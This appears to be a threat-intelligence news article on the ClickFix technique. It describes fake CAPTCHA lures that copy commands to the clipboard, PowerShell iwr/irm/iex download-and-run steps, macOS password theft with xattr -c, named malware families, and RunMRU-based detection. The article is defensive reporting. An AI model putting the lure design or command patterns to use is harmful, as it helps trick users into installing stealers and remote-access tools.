In early 2024, cybersecurity researchers identified a sophisticated social engineering technique known as ClickFix, which has rapidly gained traction among threat actors. This deceptive method targets both Windows and macOS devices, tricking users into executing malicious commands under the guise of legitimate technical troubleshooting procedures.
The ClickFix technique operates by presenting users with fake error messages, CAPTCHA verifications, or human verification prompts that appear to require immediate action to resolve minor technical issues. These lures are typically delivered through phishing emails, malicious advertisements, or compromised websites that redirect victims to specially crafted landing pages.
The effectiveness of this attack lies in its exploitation of users’ natural tendency to solve apparent technical problems, making it particularly dangerous as it bypasses traditional automated security solutions through human interaction.
Microsoft analysts have identified multiple threat actors leveraging ClickFix attacks to deliver a diverse array of malicious payloads, including the prolific Lumma Stealer infostealer, remote access tools such as Xworm and AsyncRAT, loaders like Latrodectus and MintsLoader, and sophisticated rootkits including a modified version of the open-source r77.
These payloads typically operate as fileless malware, loaded directly into memory by living-off-the-land binaries rather than being written to disk as traditional executable files.
The attack chain begins when victims encounter visual lures that mimic legitimate services such as Cloudflare Turnstile verification, Google reCAPTCHA, or even social media platforms like Discord. When users interact with these fake verification systems, malicious JavaScript code executes in the background, copying obfuscated commands to the user’s clipboard using the `navigator.clipboard.writeText()` function.
Technical Implementation and Command Execution
The core of the ClickFix technique revolves around manipulating the Windows Run dialog box, accessed through the Windows key + R shortcut. Threat actors have strategically chosen this approach because most users are unfamiliar with this Windows component and its potential security implications.
The malicious commands typically involve PowerShell cmdlets such as `iwr` (Invoke-WebRequest), `irm` (Invoke-RestMethod), and `iex` (Invoke-Expression) to download and execute payloads from remote servers.
A notable case study involves the Lampion malware campaign first identified in May 2025, which targeted Portuguese organizations across government, finance, and transportation sectors. The campaign utilized a sophisticated multi-stage infection process beginning with phishing emails containing ZIP files. Upon opening, these archives contained HTML files that redirected users to a fake Portuguese tax authority website hosting the ClickFix lure.
The subsequent PowerShell command downloaded an obfuscated VBScript that created additional scripts in the Windows %TEMP% directory and established persistence through scheduled tasks.
The technique’s adaptability extends beyond Windows environments, with recent campaigns observed targeting macOS users to deliver Atomic macOS Stealer (AMOS). These attacks demonstrate the technique’s cross-platform capabilities, utilizing similar social engineering tactics while adapting the underlying commands for macOS terminal execution.
The macOS variant employed sophisticated password theft mechanisms, continuously prompting users for system passwords and utilizing the stolen credentials to bypass macOS security features through `xattr -c` commands.
Detection of ClickFix attacks relies on monitoring the RunMRU registry key, which maintains a history of Run dialog executions. Security teams can identify suspicious activity by examining entries containing living-off-the-land binaries, direct IP addresses, content delivery network domains, or files with suspicious extensions.
Microsoft’s research reveals that threat actors frequently employ obfuscation techniques including Base64 encoding, string concatenation, and escaped characters to evade detection systems.
